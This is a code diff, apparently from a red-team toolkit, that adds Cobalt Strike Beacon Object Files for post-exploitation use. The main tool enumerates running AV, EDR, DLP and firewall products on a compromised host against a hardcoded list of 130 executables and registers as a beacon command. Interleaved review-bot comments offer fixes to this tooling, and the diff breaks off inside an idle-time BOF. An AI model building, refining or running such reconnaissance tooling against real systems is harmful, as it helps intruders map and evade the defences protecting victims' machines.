+	}
+
+	va_end(argList);
+	return hr;
+}
+
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+VOID BeaconOutputStreamW() {
+	STATSTG ssStreamData = { 0 };
+	SIZE_T cbSize = 0;
+	ULONG cbRead = 0;
+	LARGE_INTEGER pos;
+	LPWSTR lpwOutput = NULL;
+
+	if (FAILED(g_lpStream->lpVtbl->Stat(g_lpStream, &ssStreamData, STATFLAG_NONAME))) {
+		return;
+	}
+
+	cbSize = ssStreamData.cbSize.LowPart;
+	lpwOutput = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, cbSize + 1);
+	if (lpwOutput != NULL) {
+		pos.QuadPart = 0;
+		if (FAILED(g_lpStream->lpVtbl->Seek(g_lpStream, pos, STREAM_SEEK_SET, NULL))) {
+			goto CleanUp;
+		}
+
+		if (FAILED(g_lpStream->lpVtbl->Read(g_lpStream, lpwOutput, (ULONG)cbSize, &cbRead))) {		
+			goto CleanUp;
+		}
+
+		BeaconPrintf(CALLBACK_OUTPUT, "%ls", lpwOutput);
+	}
+
+CleanUp:
+	if (g_lpStream != NULL) {
+		g_lpStream->lpVtbl->Release(g_lpStream);
+		g_lpStream = NULL;
+	}
+
+	if (g_lpwPrintBuffer != NULL) {
+		MSVCRT$free(g_lpwPrintBuffer); 
+		g_lpwPrintBuffer = NULL;
+	}
+
+	if (lpwOutput != NULL) {
+		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpwOutput);
+	}
+	return;
+}
+
+
+
+bool CheckSecProc() {
+    bool foundSecProduct = false;
+    HANDLE procHandle;
+    PROCESSENTRY32 pe32;
+	
+	//allocate memory for list
+	size_t numSoftware = 130; //130
+    SoftwareData *softwareList = (SoftwareData *)KERNEL32$VirtualAlloc(NULL, numSoftware * sizeof(SoftwareData), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+    if (softwareList == NULL) {
+        return 1;
+    }
+
+    //Start security product list
+	softwareList[0].filename = "avastsvc.exe";
+	softwareList[0].description = L"Avast";
+	softwareList[0].category = L"AV";
+
+	softwareList[1].filename = "avastui.exe";
+	softwareList[1].description = L"Avast";
+	softwareList[1].category = L"AV";
+
+	softwareList[2].filename = "avgnt.exe";
+	softwareList[2].description = L"Avira";
+	softwareList[2].category = L"AV";
+
+	softwareList[3].filename = "avguard.exe";
+	softwareList[3].description = L"Avira";
+	softwareList[3].category = L"AV";
+
+	softwareList[4].filename = "avp.exe";
+	softwareList[4].description = L"Kaspersky";
+	softwareList[4].category = L"AV";
+
+	softwareList[5].filename = "axcrypt.exe";
+	softwareList[5].description = L"AxCrypt";
+	softwareList[5].category = L"Encryption";
+
+	softwareList[6].filename = "bdagent.exe";
+	softwareList[6].description = L"Bitdefender Total Security";
+	softwareList[6].category = L"AV";
+
+	softwareList[7].filename = "carbonsensor.exe";
+	softwareList[7].description = L"VMware Carbon Black EDR";
+	softwareList[7].category = L"EDR";
+
+	softwareList[8].filename = "cbcomms.exe";
+	softwareList[8].description = L"CrowdStrike Falcon Insight XDR";
+	softwareList[8].category = L"XDR";
+
+	softwareList[9].filename = "ccsvchst.exe";
+	softwareList[9].description = L"Symantec Endpoint Protection";
+	softwareList[9].category = L"AV";
+
+	softwareList[10].filename = "cpd.exe";
+	softwareList[10].description = L"Check Point Daemon";
+	softwareList[10].category = L"Security";
+
+	softwareList[11].filename = "cpx.exe";
+	softwareList[11].description = L"SentinelOne Singularity XDR";
+	softwareList[11].category = L"XDR";
+
+	softwareList[12].filename = "csfalconservice.exe";
+	softwareList[12].description = L"CrowdStrike Falcon Insight XDR";
+	softwareList[12].category = L"XDR";
+
+	softwareList[13].filename = "cybereason.exe";
+	softwareList[13].description = L"Cybereason EDR";
+	softwareList[13].category = L"EDR";
+
+	softwareList[14].filename = "cytomicendpoint.exe";
+	softwareList[14].description = L"Cytomic Orion";
+	softwareList[14].category = L"Security";
+
+	softwareList[15].filename = "dlpagent.exe";
+	softwareList[15].description = L"Symantec DLP Agent";
+	softwareList[15].category = L"DLP";
+
+	softwareList[16].filename = "dlpsensor.exe";
+	softwareList[16].description = L"McAfee DLP Sensor";
+	softwareList[16].category = L"DLP";
+
+	softwareList[17].filename = "dsmonitor.exe";
+	softwareList[17].description = L"DriveSentry";
+	softwareList[17].category = L"Security";
+
+	softwareList[18].filename = "dwengine.exe";
+	softwareList[18].description = L"DriveSentry";
+	softwareList[18].category = L"Security";
+
+	softwareList[19].filename = "edpa.exe";
+	softwareList[19].description = L"McAfee Endpoint Security";
+	softwareList[19].category = L"AV";
+
+	softwareList[20].filename = "egui.exe";
+	softwareList[20].description = L"ESET NOD32 AV";
+	softwareList[20].category = L"AV";
+
+	softwareList[21].filename = "ekrn.exe";
+	softwareList[21].description = L"ESET NOD32 AV";
+	softwareList[21].category = L"AV";
+
+	softwareList[22].filename = "firesvc.exe";
+	softwareList[22].description = L"FireEye Endpoint Agent";
+	softwareList[22].category = L"Security";
+
+	softwareList[23].filename = "firetray.exe";
+	softwareList[23].description = L"FireEye Endpoint Agent";
+	softwareList[23].category = L"Security";
+
+	softwareList[24].filename = "fortiedr.exe";
+	softwareList[24].description = L"FortiEDR";
+	softwareList[24].category = L"EDR";
+
+	softwareList[25].filename = "fw.exe";
+	softwareList[25].description = L"Check Point Firewall";
+	softwareList[25].category = L"Firewall";
+
+	softwareList[26].filename = "hips.exe";
+	softwareList[26].description = L"Host Intrusion Prevention System";
+	softwareList[26].category = L"HIPS";
+
+	softwareList[27].filename = "kpf4ss.exe";
+	softwareList[27].description = L"Kerio Personal Firewall";
+	softwareList[27].category = L"Firewall";
+
+	softwareList[28].filename = "mbamservice.exe";
+	softwareList[28].description = L"Malwarebytes";
+	softwareList[28].category = L"AV";
+
+	softwareList[29].filename = "mbamtray.exe";
+	softwareList[29].description = L"Malwarebytes";
+	softwareList[29].category = L"AV";
+
+	softwareList[30].filename = "mcshield.exe";
+	softwareList[30].description = L"McAfee VirusScan";
+	softwareList[30].category = L"AV";
+
+	softwareList[31].filename = "mfefire.exe";
+	softwareList[31].description = L"McAfee Host Intrusion Prevention";
+	softwareList[31].category = L"HIPS";
+
+	softwareList[32].filename = "msascuil.exe";
+	softwareList[32].description = L"Windows Defender";
+	softwareList[32].category = L"AV";
+
+	softwareList[33].filename = "msmpeng.exe";
+	softwareList[33].description = L"Windows Defender";
+	softwareList[33].category = L"AV";
+
+	softwareList[34].filename = "msseces.exe";
+	softwareList[34].description = L"Microsoft Security Essentials";
+	softwareList[34].category = L"AV";
+
+	softwareList[35].filename = "nissrv.exe";
+	softwareList[35].description = L"Microsoft Security Essentials";
+	softwareList[35].category = L"AV";
+
+	softwareList[36].filename = "outpost.exe";
+	softwareList[36].description = L"Agnitum Outpost Firewall";
+	softwareList[36].category = L"Firewall";
+
+	softwareList[37].filename = "panda_url_filtering.exe";
+	softwareList[37].description = L"Panda Security";
+	softwareList[37].category = L"AV";
+
+	softwareList[38].filename = "pavfnsvr.exe";
+	softwareList[38].description = L"Panda Security";
+	softwareList[38].category = L"AV";
+
+	softwareList[39].filename = "pavsrv.exe";
+	softwareList[39].description = L"Panda Security";
+	softwareList[39].category = L"AV";
+
+	softwareList[40].filename = "psanhost.exe";
+	softwareList[40].description = L"Panda Security";
+	softwareList[40].category = L"AV";
+
+	softwareList[41].filename = "rtvscan.exe";
+	softwareList[41].description = L"Symantec Endpoint Protection";
+	softwareList[41].category = L"AV";
+
+	softwareList[42].filename = "savservice.exe";
+	softwareList[42].description = L"Sophos Endpoint Security";
+	softwareList[42].category = L"AV";
+
+	softwareList[43].filename = "shstat.exe";
+	softwareList[43].description = L"McAfee VirusScan";
+	softwareList[43].category = L"AV";
+
+	softwareList[44].filename = "sophosav.exe";
+	softwareList[44].description = L"Sophos Endpoint Security";
+	softwareList[44].category = L"AV";
+
+	softwareList[45].filename = "sophossps.exe";
+	softwareList[45].description = L"Sophos Endpoint Security";
+	softwareList[45].category = L"AV";
+
+	softwareList[46].filename = "sophosui.exe";
+	softwareList[46].description = L"Sophos Endpoint Security";
+	softwareList[46].category = L"AV";
+
+	softwareList[47].filename = "sysmon.exe";
+	softwareList[47].description = L"Microsoft Sysmon";
+	softwareList[47].category = L"Security";
+
+	softwareList[48].filename = "tanclient.exe";
+	softwareList[48].description = L"Tanium EDR";
+	softwareList[48].category = L"EDR";
+
+	softwareList[49].filename = "tmntsrv.exe";
+	softwareList[49].description = L"Trend Micro OfficeScan";
+	softwareList[49].category = L"AV";
+
+	softwareList[50].filename = "tmproxy.exe";
+	softwareList[50].description = L"Trend Micro OfficeScan";
+	softwareList[50].category = L"AV";
+
+	softwareList[51].filename = "trapsagent.exe";
+	softwareList[51].description = L"Palo Alto Networks Cortex XDR";
+	softwareList[51].category = L"XDR";
+
+	softwareList[52].filename = "trapsd.exe";
+	softwareList[52].description = L"Palo Alto Networks Cortex XDR";
+	softwareList[52].category = L"XDR";
+
+	softwareList[53].filename = "truecrypt.exe";
+	softwareList[53].description = L"TrueCrypt";
+	softwareList[53].category = L"Encryption";
+
+	softwareList[54].filename = "vsserv.exe";
+	softwareList[54].description = L"Bitdefender Total Security";
+	softwareList[54].category = L"AV";
+
+	softwareList[55].filename = "wrsa.exe";
+	softwareList[55].description = L"Webroot Anywhere";
+	softwareList[55].category = L"AV";
+
+	softwareList[56].filename = "windefend.exe";
+	softwareList[56].description = L"Windows Defender";
+	softwareList[56].category = L"AV";
+
+	softwareList[57].filename = "xagt.exe";
+	softwareList[57].description = L"FireEye HX";
+	softwareList[57].category = L"Security";
+
+	softwareList[58].filename = "ahnsd.exe";
+	softwareList[58].description = L"AhnLab V3 Internet Security";
+	softwareList[58].category = L"AV";
+
+	softwareList[59].filename = "amsiagent.exe";
+	softwareList[59].description = L"Bromium AMSI Agent";
+	softwareList[59].category = L"Security";
+
+	softwareList[60].filename = "avkwctl.exe";
+	softwareList[60].description = L"K7 Total Security";
+	softwareList[60].category = L"AV";
+
+	softwareList[61].filename = "avmailc.exe";
+	softwareList[61].description = L"Avira MailGuard";
+	softwareList[61].category = L"AV";
+
+	softwareList[62].filename = "avgemc.exe";
+	softwareList[62].description = L"AVG Email Scanner";
+	softwareList[62].category = L"AV";
+
+	softwareList[63].filename = "avgidsagent.exe";
+	softwareList[63].description = L"AVG Identity Protection";
+	softwareList[63].category = L"Security";
+
+	softwareList[64].filename = "avkmgr.exe";
+	softwareList[64].description = L"K7 Total Security";
+	softwareList[64].category = L"AV";
+
+	softwareList[65].filename = "avshadow.exe";
+	softwareList[65].description = L"Avira Shadow Copy Service";
+	softwareList[65].category = L"AV";
+
+	softwareList[66].filename = "avwebgrd.exe";
+	softwareList[66].description = L"Avira Web Protection";
+	softwareList[66].category = L"AV";
+
+	softwareList[67].filename = "bavtray.exe";
+	softwareList[67].description = L"Baidu Antivirus";
+	softwareList[67].category = L"AV";
+
+	softwareList[68].filename = "bavupdat.exe";
+	softwareList[68].description = L"Baidu Antivirus Updater";
+	softwareList[68].category = L"AV";
+
+	softwareList[69].filename = "bdredline.exe";
+	softwareList[69].description = L"Bitdefender Redline";
+	softwareList[69].category = L"AV";
+
+	softwareList[70].filename = "bdsubwiz.exe";
+	softwareList[70].description = L"Bitdefender Submission Wizard";
+	softwareList[70].category = L"AV";
+
+	softwareList[71].filename = "cfp.exe";
+	softwareList[71].description = L"COMODO Firewall";
+	softwareList[71].category = L"Firewall";
+
+	softwareList[72].filename = "cmdagent.exe";
+	softwareList[72].description = L"COMODO Internet Security";
+	softwareList[72].category = L"AV";
+
+	softwareList[73].filename = "csavtray.exe";
+	softwareList[73].description = L"Centennial Endpoint Security";
+	softwareList[73].category = L"AV";
+
+	softwareList[74].filename = "csinsm32.exe";
+	softwareList[74].description = L"Centennial Endpoint Security";
+	softwareList[74].category = L"AV";
+
+	softwareList[75].filename = "fprot.exe";
+	softwareList[75].description = L"F-Prot Antivirus";
+	softwareList[75].category = L"AV";
+
+	softwareList[76].filename = "fpwin.exe";
+	softwareList[76].description = L"F-Prot Antivirus";
+	softwareList[76].category = L"AV";
+
+	softwareList[77].filename = "frzstate2k.exe";
+	softwareList[77].description = L"Faronics Deep Freeze";
+	softwareList[77].category = L"Security";
+
+	softwareList[78].filename = "gdatpagent.exe";
+	softwareList[78].description = L"Symantec Data Loss Prevention";
+	softwareList[78].category = L"DLP";
+
+	softwareList[79].filename = "gfiarksvc.exe";
+	softwareList[79].description = L"GFI LanGuard";
+	softwareList[79].category = L"Security";
+
+	softwareList[80].filename = "gfiarktray.exe";
+	softwareList[80].description = L"GFI LanGuard";
+	softwareList[80].category = L"Security";
+
+	softwareList[81].filename = "hexisagent.exe";
+	softwareList[81].description = L"Hexis HawkEye G";
+	softwareList[81].category = L"EDR";
+
+	softwareList[82].filename = "hexiscybereye.exe";
+	softwareList[82].description = L"Hexis CyberEye";
+	softwareList[82].category = L"Security";
+
+	softwareList[83].filename = "k7avtray.exe";
+	softwareList[83].description = L"K7 Total Security";
+	softwareList[83].category = L"AV";
+
+	softwareList[84].filename = "k7rtscan.exe";
+	softwareList[84].description = L"K7 Total Security";
+	softwareList[84].category = L"AV";
+
+	softwareList[85].filename = "k7uascan.exe";
+	softwareList[85].description = L"K7 Total Security";
+	softwareList[85].category = L"AV";
+
+	softwareList[86].filename = "k7upschdl.exe";
+	softwareList[86].description = L"K7 Total Security";
+	softwareList[86].category = L"AV";
+
+	softwareList[87].filename = "k7wscsvc.exe";
+	softwareList[87].description = L"K7 Total Security";
+	softwareList[87].category = L"AV";
+
+	softwareList[88].filename = "k7wscwiz.exe";
+	softwareList[88].description = L"K7 Total Security";
+	softwareList[88].category = L"AV";
+
+	softwareList[89].filename = "languard.exe";
+	softwareList[89].description = L"GFI LanGuard";
+	softwareList[89].category = L"Security";
+
+	softwareList[90].filename = "mbae.exe";
+	softwareList[90].description = L"Malwarebytes Anti-Exploit";
+	softwareList[90].category = L"Security";
+
+	softwareList[91].filename = "nxclient.exe";
+	softwareList[91].description = L"Nexusguard Endpoint Protection";
+	softwareList[91].category = L"AV";
+
+	softwareList[92].filename = "nxtray.exe";
+	softwareList[92].description = L"Nexusguard Endpoint Protection";
+	softwareList[92].category = L"AV";
+
+	softwareList[93].filename = "panda_tpsrv.exe";
+	softwareList[93].description = L"Panda Security";
+	softwareList[93].category = L"AV";
+
+	softwareList[94].filename = "pcmaticrt.exe";
+	softwareList[94].description = L"PC Matic Real-Time";
+	softwareList[94].category = L"AV";
+
+	softwareList[95].filename = "pcmatrtsystray.exe";
+	softwareList[95].description = L"PC Matic";
+	softwareList[95].category = L"AV";
+
+	softwareList[96].filename = "pclxav.exe";
+	softwareList[96].description = L"PC-Linq AntiVirus";
+	softwareList[96].category = L"AV";
+
+	softwareList[97].filename = "pcmaticsvc.exe";
+	softwareList[97].description = L"PC Matic";
+	softwareList[97].category = L"AV";
+
+	softwareList[98].filename = "qhpserver.exe";
+	softwareList[98].description = L"Qihoo 360 Total Security";
+	softwareList[98].category = L"AV";
+
+	softwareList[99].filename = "qihoo_ts.exe";
+	softwareList[99].description = L"Qihoo 360 Total Security";
+	softwareList[99].category = L"AV";
+
+	softwareList[100].filename = "sbamsvc.exe";
+	softwareList[100].description = L"VIPRE Antivirus";
+	softwareList[100].category = L"AV";
+
+	softwareList[101].filename = "sbamtray.exe";
+	softwareList[101].description = L"VIPRE Antivirus";
+	softwareList[101].category = L"AV";
+
+	softwareList[102].filename = "sbamui.exe";
+	softwareList[102].description = L"VIPRE Antivirus";
+	softwareList[102].category = L"AV";
+
+	softwareList[103].filename = "sfc.exe";
+	softwareList[103].description = L"System File Checker";
+	softwareList[103].category = L"Security";
+
+	softwareList[104].filename = "smc.exe";
+	softwareList[104].description = L"Symantec Endpoint Protection";
+	softwareList[104].category = L"AV";
+
+	softwareList[105].filename = "sophoscleaner.exe";
+	softwareList[105].description = L"Sophos Virus Removal Tool";
+	softwareList[105].category = L"AV";
+
+	softwareList[106].filename = "sophoshealth.exe";
+	softwareList[106].description = L"Sophos Endpoint Security";
+	softwareList[106].category = L"AV";
+
+	softwareList[107].filename = "sophosinstaller.exe";
+	softwareList[107].description = L"Sophos Endpoint Security";
+	softwareList[107].category = L"AV";
+
+	softwareList[108].filename = "sophosmcsagentd.exe";
+	softwareList[108].description = L"Sophos Endpoint Security";
+	softwareList[108].category = L"AV";
+
+	softwareList[109].filename = "sophosntivirus.exe";
+	softwareList[109].description = L"Sophos Endpoint Security";
+	softwareList[109].category = L"AV";
+
+	softwareList[110].filename = "swdoctor.exe";
+	softwareList[110].description = L"Spyware Doctor";
+	softwareList[110].category = L"AV";
+
+	softwareList[111].filename = "swupdate.exe";
+	softwareList[111].description = L"Spyware Doctor";
+	softwareList[111].category = L"AV";
+
+	softwareList[112].filename = "symcorpui.exe";
+	softwareList[112].description = L"Symantec Endpoint Protection";
+	softwareList[112].category = L"AV";
+
+	softwareList[113].filename = "symerr.exe";
+	softwareList[113].description = L"Symantec Endpoint Protection";
+	softwareList[113].category = L"AV";
+
+	softwareList[114].filename = "symlcsvc.exe";
+	softwareList[114].description = L"Symantec Endpoint Protection";
+	softwareList[114].category = L"AV";
+
+	softwareList[115].filename = "symwsc.exe";
+	softwareList[115].description = L"Symantec Endpoint Protection";
+	softwareList[115].category = L"AV";
+
+	softwareList[116].filename = "tsmains.exe";
+	softwareList[116].description = L"Tencent PC Manager";
+	softwareList[116].category = L"AV";
+
+	softwareList[117].filename = "tsvncache.exe";
+	softwareList[117].description = L"Tencent PC Manager";
+	softwareList[117].category = L"AV";
+
+	softwareList[118].filename = "umbrella.exe";
+	softwareList[118].description = L"Cisco Umbrella";
+	softwareList[118].category = L"Security";
+
+	softwareList[119].filename = "umbrella_roamingclient.exe";
+	softwareList[119].description = L"Cisco Umbrella Roaming Client";
+	softwareList[119].category = L"Security";
+
+	softwareList[120].filename = "viprerestart.exe";
+	softwareList[120].description = L"VIPRE Antivirus";
+	softwareList[120].category = L"AV";
+
+	softwareList[121].filename = "vpc.exe";
+	softwareList[121].description = L"Virus Protection Center";
+	softwareList[121].category = L"AV";
+
+	softwareList[122].filename = "webinspect.exe";
+	softwareList[122].description = L"HP WebInspect";
+	softwareList[122].category = L"Security";
+
+	softwareList[123].filename = "webrootsecureanywhere.exe";
+	softwareList[123].description = L"Webroot SecureAnywhere";
+	softwareList[123].category = L"AV";
+
+	softwareList[124].filename = "wpctrl.exe";
+	softwareList[124].description = L"Webroot Parental Controls";
+	softwareList[124].category = L"Security";
+
+	softwareList[125].filename = "wpff.exe";
+	softwareList[125].description = L"Webroot Parental Controls";
+	softwareList[125].category = L"Security";
+
+	softwareList[126].filename = "wscsvc.exe";
+	softwareList[126].description = L"Windows Security Center";
+	softwareList[126].category = L"Security";
+
+	softwareList[127].filename = "zanda.exe";
+	softwareList[127].description = L"ZoneAlarm Antivirus";
+	softwareList[127].category = L"AV";
+
+	softwareList[128].filename = "zatutor.exe";
+	softwareList[128].description = L"ZoneAlarm Antivirus";
+	softwareList[128].category = L"AV";
+
+	softwareList[129].filename = "zlclient.exe";
+	softwareList[129].description = L"ZoneAlarm Security Suite";
+	softwareList[129].category = L"AV";
+	//End security product list
+
+
+	//get list of running processes 
+	procHandle = KERNEL32$CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+    if (procHandle == INVALID_HANDLE_VALUE) {
+        return false;
+    }
+
+    pe32.dwSize = sizeof(PROCESSENTRY32);
+    if (!KERNEL32$Process32First(procHandle, &pe32)) {
+        KERNEL32$CloseHandle(procHandle);
+        return false;
+    }
+	
+	//compare list with running processes
+	BeaconPrintToStreamW(L"\nDescription\t\t\t\t\tCategory\n");
+	BeaconPrintToStreamW(L"===============================================================\n");
+    do {
+        char procName[MAX_PATH];
+        MSVCRT$strcpy(procName, pe32.szExeFile);
+        for (size_t i = 0; procName[i]; i++) {
+            procName[i] = MSVCRT$tolower(procName[i]); 
+        }
+
+        for (size_t i = 0; i < numSoftware; i++) {
+            if (MSVCRT$strcmp(procName, softwareList[i].filename) == 0) {
+                foundSecProduct = true;
+                BeaconPrintToStreamW(L"%-50ls\t%ls\n", softwareList[i].description, softwareList[i].category);
+                break;
+            }
+        }
+    } while (KERNEL32$Process32Next(procHandle, &pe32));
+
+    KERNEL32$CloseHandle(procHandle);
+	KERNEL32$VirtualFree(softwareList, 0, MEM_RELEASE);
+
+    return foundSecProduct;
+}
+
+
+int go() {
+    if (CheckSecProc()) {
+		BeaconOutputStreamW();
+        BeaconPrintf(CALLBACK_OUTPUT,"\n[+] Finished enumerating security products.\n");
+    } else {
+        BeaconPrintf(CALLBACK_OUTPUT,"\n[+] No security products from the list were found on the system!\n");
+    }
+    return 0;
+}

+ 18 - 0
KIT/EnumSecProducts/enumsecproducts.cna

@@ -0,0 +1,18 @@
+# author REDMED-X
+
+beacon_command_register(
+	"enumsecproducts", "List security products running on the system.",
+	"INFO:\nGet a list of security products (like AV/EDR) that are running on the system. This is done by comparing running processes against a hardcoded list of 130 security products.\n\n" .
+	"USAGE:\nenumsecproducts\n\n");
+	
+alias enumsecproducts {
+    $bid = $1;
+
+    # Read in the right BOF file
+    $handle = openf(script_resource("enumsecproducts.o"));
+    $data = readb($handle, -1);
+    closef($handle);
+
+	blog($bid, "Tasked to list running security products..");
+    beacon_inline_execute($bid, $data, "go", $null);
+}
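Review bot: The object-file read in the `enumsecproducts` alias is never validated, so a missing or unreadable `enumsecproducts.o` still tasks the beacon with empty data and the operator only sees a confusing failure from the beacon side. Guard the call with `if (strlen($data) == 0) { berror($bid, "could not read enumsecproducts.o"); return; }` between `closef($handle);` and `beacon_inline_execute` (assuming `readb` yields an empty string on failure — confirm). The same unguarded pattern appears in the `idletime` alias of `KIT/IdleTime/idletime.cna`.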

+ 33 - 0
KIT/EnumSecProducts/enumsecproducts.h

@@ -0,0 +1,33 @@
+#include <windows.h>  
+
+//CheckSecProc
+DECLSPEC_IMPORT void * WINAPI KERNEL32$VirtualAlloc (LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
+DECLSPEC_IMPORT int WINAPI KERNEL32$VirtualFree (LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD, DWORD th32ProcessID);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$Process32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$Process32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);
+DECLSPEC_IMPORT char* __cdecl MSVCRT$strcpy(char* _Dest, const char* _Source);
+DECLSPEC_IMPORT int __cdecl MSVCRT$tolower(int _C);
+WINBASEAPI int __cdecl MSVCRT$strcmp(const char *str1, const char *str2);
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...);
+
+//BeaconPrintToStreamW + BeaconOutputStreamW
+#define MAX_STRING 8192
+INT g_iGarbage = 1;
+LPSTREAM g_lpStream = (LPSTREAM)1;
+LPWSTR g_lpwPrintBuffer = (LPWSTR)1;
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CreateStreamOnHGlobal(HGLOBAL hGlobal, BOOL fDeleteOnRelease, LPSTREAM *ppstm);
+WINBASEAPI void *__cdecl MSVCRT$calloc(size_t number, size_t size);
+WINBASEAPI int __cdecl MSVCRT$_vsnwprintf_s(wchar_t *buffer, size_t sizeOfBuffer, size_t count, const wchar_t *format, va_list argptr);
+WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str);
+WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
+WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
+WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
+WINBASEAPI void __cdecl MSVCRT$free(void *memblock);
+WINBASEAPI BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
+DECLSPEC_IMPORT int WINAPI KERNEL32$MultiByteToWideChar(UINT CodePage, DWORD dwFlags, _In_NLS_string_(cbMultiByte)LPCCH lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);
+
+
+
+
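Review bot: `g_iGarbage`, `g_lpStream` and `g_lpwPrintBuffer` are defined (not merely declared) in a header and initialised to the placeholder value `1` without any explanation, so a later maintainer cannot tell whether those non-zero initialisers are load-bearing or can be replaced by `NULL`/`0`. Presumably they exist to keep the variables out of `.bss`, which a BOF loader does not necessarily map — confirm and record it on those lines, e.g. `// initialised non-zero so they land in .data rather than .bss, which the BOF loader may not map; overwritten before first use`. Separately, `KERNEL32$GetProcessHeap()` should be prototyped as `KERNEL32$GetProcessHeap(void)` so the compiler rejects accidental arguments, matching the `(void)` form used for `KERNEL32$GetTickCount` in `idletime.h`.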

BIN
KIT/EnumSecProducts/enumsecproducts.o


+ 15 - 0
KIT/IdleTime/README.md

@@ -0,0 +1,15 @@
+# ListSecProducts
+Check current user activity based on the user's last input. Returns the time in format HH:MM:SS.
+
+
+## Usage
+* `idletime`
+
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 
+
+

+ 69 - 0
KIT/IdleTime/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

+ 6 - 0
KIT/IdleTime/bofcompile.bat

@@ -0,0 +1,6 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc idletime.c
+move /y idletime.obj idletime.o
+
+
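Review bot: `/W0` silences every compiler diagnostic, including the implicit-declaration and prototype-mismatch warnings that are the only compile-time check a BOF gets on its `DECLSPEC_IMPORT` declarations, and the `move` runs regardless of whether `cl.exe` succeeded, so a broken build can leave a stale `idletime.o` in place. Suggest `cl.exe /nologo /c /Od /MT /W3 /GS- /Tc idletime.c || exit /b 1` before the `move`. A one-line `REM` explaining why `/GS-` is required (presumably because the stack-cookie helper cannot be resolved inside a BOF — confirm) would also help whoever next edits the flags.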

+ 35 - 0
KIT/IdleTime/idletime.c

@@ -0,0 +1,35 @@
+#include <stdio.h>
+#include <windows.h>
+#include "idletime.h"
+#include "beacon.h"
+
+#pragma comment(lib, "User32.lib")
+
+
+DWORD GetIdleTimeInSeconds() {
+    LASTINPUTINFO lii;
